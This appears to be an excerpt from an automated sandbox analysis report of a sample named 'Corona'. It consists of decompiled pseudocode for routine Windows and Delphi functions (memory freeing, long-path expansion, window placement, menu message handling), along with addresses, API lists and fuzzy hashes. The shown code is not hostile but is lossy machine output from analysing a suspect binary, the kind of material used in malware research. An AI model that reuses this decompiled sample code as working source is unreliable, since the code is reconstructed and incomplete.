                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 08db484000f1b3b7bd2ec46c471356415397cf5bd5ae5d8ee96f136c43daa6e5
                                  • Instruction ID: f847d22d3f01dd1dd75fe648ca62a3522005762b33191eeb26566d353b78ad07
                                  • Opcode Fuzzy Hash: 08db484000f1b3b7bd2ec46c471356415397cf5bd5ae5d8ee96f136c43daa6e5
                                  • Instruction Fuzzy Hash: 28115E742403059FD710EF59C880B86F7E5EF48390F20C63BE9588B386D3B8E8548BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040173C, Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0040173C(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x4525e8; // 0x5ba96c
				while(_t19 != 0x4525e8) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x4525c4 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                  0x00401740
                                  0x00401751
                                  0x00401758
                                  0x00401761
                                  0x00401765
                                  0x00401768
                                  0x0040176b
                                  0x004017ab
                                  0x00401773
                                  0x00401779
                                  0x0040177e
                                  0x00401780
                                  0x00401780
                                  0x00401785
                                  0x00401787
                                  0x00401787
                                  0x0040178b
                                  0x00401796
                                  0x0040179d
                                  0x0040179f
                                  0x0040179f
                                  0x0040179d
                                  0x004017a9
                                  0x004017a9
                                  0x004017b8

                                  APIs
                                  • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,004019A3), ref: 00401796
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 0d4d1b427f1ec69ba0c8b7c4076ac1d43960bee830523fbcc895a058ce1d439e
                                  • Instruction ID: 641e87d4905fd7c12af222c95323f90e351f4d8beb81f8afba53f3c53fc6d5e9
                                  • Opcode Fuzzy Hash: 0d4d1b427f1ec69ba0c8b7c4076ac1d43960bee830523fbcc895a058ce1d439e
                                  • Instruction Fuzzy Hash: 5D01F77AA443045FC3109E29DDC0E2A77E8EBC5324F15057FDE84A73A1D27AAC0187E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00404F24, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00404F24(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404F10(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404F10(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401294();
									while( *_t93 != 0) {
										_t90 = E00404F10(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401294();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L0040129C();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401294();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L0040129C();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401294();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401294();
						}
					}
				}
				L17:
				return _v16;
			}



















                                  0x00404f30
                                  0x00404f33
                                  0x00404f39
                                  0x00404f46
                                  0x00404f4a
                                  0x00404f8c
                                  0x00404f92
                                  0x00404fcf
                                  0x00000000
                                  0x00404f94
                                  0x00404f9b
                                  0x00404fac
                                  0x00404fb1
                                  0x00404fb7
                                  0x00404fbf
                                  0x00404fc4
                                  0x00404fd2
                                  0x00404fd4
                                  0x00404fda
                                  0x00404fde
                                  0x00404fe5
                                  0x00404fe6
                                  0x00405091
                                  0x00404ff8
                                  0x00404ffc
                                  0x00405009
                                  0x00405010
                                  0x00405011
                                  0x0040501a
                                  0x0040501b
                                  0x00405033
                                  0x00405038
                                  0x0040503b
                                  0x00405040
                                  0x00405046
                                  0x00405047
                                  0x00405057
                                  0x00405059
                                  0x00405069
                                  0x00405070
                                  0x0040507a
                                  0x0040507b
                                  0x00405080
                                  0x00405086
                                  0x00405087
                                  0x0040508d
                                  0x0040508f
                                  0x00000000
                                  0x0040508f
                                  0x00405057
                                  0x00405038
                                  0x00000000
                                  0x00405009
                                  0x0040509d
                                  0x004050a4
                                  0x004050a8
                                  0x004050a9
                                  0x004050a9
                                  0x00404fc4
                                  0x00404fb1
                                  0x00404f9b
                                  0x00404f4c
                                  0x00404f57
                                  0x00404f5b
                                  0x00000000
                                  0x00404f5d
                                  0x00404f5d
                                  0x00404f68
                                  0x00404f6c
                                  0x00404f71
                                  0x00000000
                                  0x00404f73
                                  0x00404f76
                                  0x00404f7d
                                  0x00404f81
                                  0x00404f82
                                  0x00404f82
                                  0x00404f71
                                  0x00404f5b
                                  0x004050ae
                                  0x004050b7

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,004500A4,?,00405184,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404F41
                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00404F52
                                  • lstrcpyn.KERNEL32(?,?,?,?,00000001,004500A4,?,00405184,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404F82
                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,004500A4,?,00405184,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404FE6
                                  • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,004500A4,?,00405184,00000000,004051E1,?,80000001), ref: 0040501B
                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,004500A4,?,00405184,00000000,004051E1), ref: 0040502E
                                  • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,004500A4,?,00405184,00000000), ref: 0040503B
                                  • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,004500A4,?,00405184), ref: 00405047
                                  • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040507B
                                  • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405087
                                  • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 004050A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                  • API String ID: 3245196872-1565342463
                                  • Opcode ID: a49087359afbccc2ea5e90e63e4b60f7de63aaa6822c551a5f74ceed597ab360
                                  • Instruction ID: 49c6d4311e289c438fd2c70541c163e2c743289adc26ad2d4731e14be02609e3
                                  • Opcode Fuzzy Hash: a49087359afbccc2ea5e90e63e4b60f7de63aaa6822c551a5f74ceed597ab360
                                  • Instruction Fuzzy Hash: 6241B372900559AFDB10EAE8CD85ADFB7ECDF44304F1401FBA948F7291D6789E448B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00435160, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00435160(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E0042DE48(_t43);
			}










                                  0x00435163
                                  0x00435166
                                  0x00435176
                                  0x004351a5
                                  0x00435178
                                  0x00435178
                                  0x0043518c
                                  0x00435197
                                  0x00435198
                                  0x00435199
                                  0x0043519a
                                  0x0043519a
                                  0x004351bd
                                  0x004351cd
                                  0x004351d1
                                  0x004351d5
                                  0x004351e0
                                  0x004351e0
                                  0x004351d1
                                  0x004351e8
                                  0x004351ef
                                  0x004351f9
                                  0x00435204
                                  0x00435214

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                  • String ID: ,
                                  • API String ID: 2266315723-3772416878
                                  • Opcode ID: 4df2605af39a00d05aa63d556f06aa7b2b168abb5a11a6a32e6e992e18841258
                                  • Instruction ID: 645734bca59295413249d5861259c1976bc353503050279604c6b6bdde8c1864
                                  • Opcode Fuzzy Hash: 4df2605af39a00d05aa63d556f06aa7b2b168abb5a11a6a32e6e992e18841258
                                  • Instruction Fuzzy Hash: 4A118E71904610AFCB11DF6DC885A8B37E8AF4D314F054A3EFD58DB286DB39E9048B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004421FC, Relevance: 10.9, APIs: 7, Instructions: 405nativeCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E004421FC(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t307;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x44272f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E004415A8(E004136F8(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x450fc8; // 0x452bb0
								E0044E57C( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E004136F8(_v8, _t368);
									_t295 = _v17;
									_v16 = E004414EC(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E0042B958( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x450fc8; // 0x452bb0
								E0044E57C( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E004136F8(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E004414EC(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E00441DEC(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E004136F8(_v8, _t370);
								_t181 = E0044158C( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E004414EC(E004136F8(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041CD48(0, 1);
								_push(_t377);
								_push(0x442562);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x442545);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E0041D34C(_v24,  *(_v40 + 0x18));
								E0041D1EC(_v24);
								E004429D4(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x44254c);
								__eflags = 0;
								E0041D34C(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E004414EC(E004136F8(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00406484();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0041CD48(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E0041D34C(_v24, _v32);
									E0041D1EC(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x442663, _t377,  *[fs:eax], 0x442680, _t377,  *[fs:eax], 0x4426a5, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x44266a);
									__eflags = 0;
									E0041D34C(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E004136F8(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E004414EC(E004136F8(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E004136F8(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E0044151C(E004136F8(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E004136F8(_v8, _t373);
											__eflags = 0;
											_t257 = E0044151C(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x451104; // 0x452bb4
										_t355 =  *( *_t353 + 0x6c);
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											_t307 =  *0x451104; // 0x452bb4
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x450fc8; // 0x452bb0
												E0044E220( *_t356, _t291, _t307, _t257, _t373, _t375);
											} else {
												E0044E288();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L00406294();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x442736);
								return E00403E4C( &_v52);
							}
						}
					}
				}
				L69:
			}



































































                                  0x004421fd
                                  0x004421ff
                                  0x00442207
                                  0x0044220a
                                  0x0044220c
                                  0x00442211
                                  0x00442212
                                  0x00442217
                                  0x0044221a
                                  0x0044221d
                                  0x0044221f
                                  0x00442224
                                  0x00442246
                                  0x00442246
                                  0x0044224b
                                  0x0044229a
                                  0x0044229b
                                  0x0044229d
                                  0x00000000
                                  0x004422a3
                                  0x004422a3
                                  0x004422a4
                                  0x004422a4
                                  0x004422a6
                                  0x004422b3
                                  0x004422b8
                                  0x004422ba
                                  0x00000000
                                  0x00000000
                                  0x004422c0
                                  0x004422c1
                                  0x004422c1
                                  0x004422c2
                                  0x00000000
                                  0x004422c4
                                  0x00000000
                                  0x004422c4
                                  0x00000000
                                  0x004422c2
                                  0x004422a6
                                  0x0044224d
                                  0x0044224d
                                  0x0044224d
                                  0x00442250
                                  0x004422c9
                                  0x004422cd
                                  0x004422d1
                                  0x004422d3
                                  0x004422d3
                                  0x004422dd
                                  0x004422de
                                  0x004422e0
                                  0x00442356
                                  0x00442356
                                  0x0044235f
                                  0x00000000
                                  0x004422e2
                                  0x004422e2
                                  0x004422e3
                                  0x004422e3
                                  0x004422e5
                                  0x004422e5
                                  0x004422e9
                                  0x0044230f
                                  0x004422eb
                                  0x004422eb
                                  0x004422ee
                                  0x004422f0
                                  0x00442302
                                  0x004422f2
                                  0x004422fd
                                  0x004422fd
                                  0x004422f0
                                  0x00442317
                                  0x0044231c
                                  0x00442327
                                  0x0044232a
                                  0x0044232e
                                  0x00000000
                                  0x00000000
                                  0x00442352
                                  0x00442353
                                  0x00442353
                                  0x00442354
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00442354
                                  0x00442339
                                  0x00442341
                                  0x00442348
                                  0x00442348
                                  0x00442252
                                  0x00442252
                                  0x00442253
                                  0x004426bc
                                  0x004426bd
                                  0x004426bf
                                  0x00000000
                                  0x004426c1
                                  0x004426c1
                                  0x004426c2
                                  0x004426c2
                                  0x004426c4
                                  0x004426ce
                                  0x004426d6
                                  0x004426d9
                                  0x004426dc
                                  0x00000000
                                  0x00000000
                                  0x004426e6
                                  0x004426eb
                                  0x004426ed
                                  0x004426fb
                                  0x004426fc
                                  0x004426fc
                                  0x004426fd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004426ed
                                  0x004426f4
                                  0x004426f4
                                  0x00442259
                                  0x00000000
                                  0x00442259
                                  0x00442253
                                  0x00442250
                                  0x00000000
                                  0x00442226
                                  0x00442226
                                  0x00442264
                                  0x00442265
                                  0x00442267
                                  0x00000000
                                  0x0044226d
                                  0x0044226d
                                  0x0044226e
                                  0x0044226e
                                  0x00442270
                                  0x00442275
                                  0x0044227e
                                  0x00442283
                                  0x00442285
                                  0x00000000
                                  0x00000000
                                  0x0044228b
                                  0x0044228c
                                  0x0044228c
                                  0x0044228d
                                  0x00000000
                                  0x0044228f
                                  0x00000000
                                  0x0044228f
                                  0x00000000
                                  0x0044228d
                                  0x00442270
                                  0x00000000
                                  0x00442228
                                  0x00442228
                                  0x0044222b
                                  0x0044246e
                                  0x00442477
                                  0x00442478
                                  0x0044247a
                                  0x00000000
                                  0x00442480
                                  0x00442480
                                  0x00442481
                                  0x00442481
                                  0x00442483
                                  0x0044249a
                                  0x0044249d
                                  0x004424a1
                                  0x00000000
                                  0x00000000
                                  0x00442569
                                  0x0044256a
                                  0x0044256a
                                  0x0044256b
                                  0x00000000
                                  0x00442571
                                  0x00000000
                                  0x00442571
                                  0x00000000
                                  0x0044256b
                                  0x004424b3
                                  0x004424b8
                                  0x004424b9
                                  0x004424be
                                  0x004424c1
                                  0x004424d0
                                  0x004424d5
                                  0x004424d6
                                  0x004424db
                                  0x004424de
                                  0x004424ea
                                  0x004424ff
                                  0x00442518
                                  0x0044251f
                                  0x00442522
                                  0x00442525
                                  0x0044252a
                                  0x0044252f
                                  0x00442544
                                  0x00442544
                                  0x00442231
                                  0x00442231
                                  0x00442232
                                  0x00442579
                                  0x00442582
                                  0x00442583
                                  0x00442585
                                  0x00000000
                                  0x0044258b
                                  0x0044258b
                                  0x0044258c
                                  0x0044258c
                                  0x0044258e
                                  0x004425a5
                                  0x004425a8
                                  0x004425ac
                                  0x00000000
                                  0x00000000
                                  0x004426ac
                                  0x004426ad
                                  0x004426ad
                                  0x004426ae
                                  0x00000000
                                  0x004426b4
                                  0x00000000
                                  0x004426b4
                                  0x00000000
                                  0x004426ae
                                  0x004425b5
                                  0x004425b9
                                  0x004425be
                                  0x004425cc
                                  0x004425db
                                  0x004425e9
                                  0x004425f5
                                  0x00442603
                                  0x0044260c
                                  0x00442621
                                  0x0044263b
                                  0x00442640
                                  0x00442643
                                  0x00442646
                                  0x0044264b
                                  0x00442650
                                  0x00442662
                                  0x00442662
                                  0x00442238
                                  0x0044223b
                                  0x0044236c
                                  0x00442375
                                  0x00442376
                                  0x00442378
                                  0x00000000
                                  0x0044237e
                                  0x0044237e
                                  0x0044237f
                                  0x0044237f
                                  0x00442381
                                  0x0044238d
                                  0x00442390
                                  0x00442393
                                  0x00442396
                                  0x004423c1
                                  0x00442398
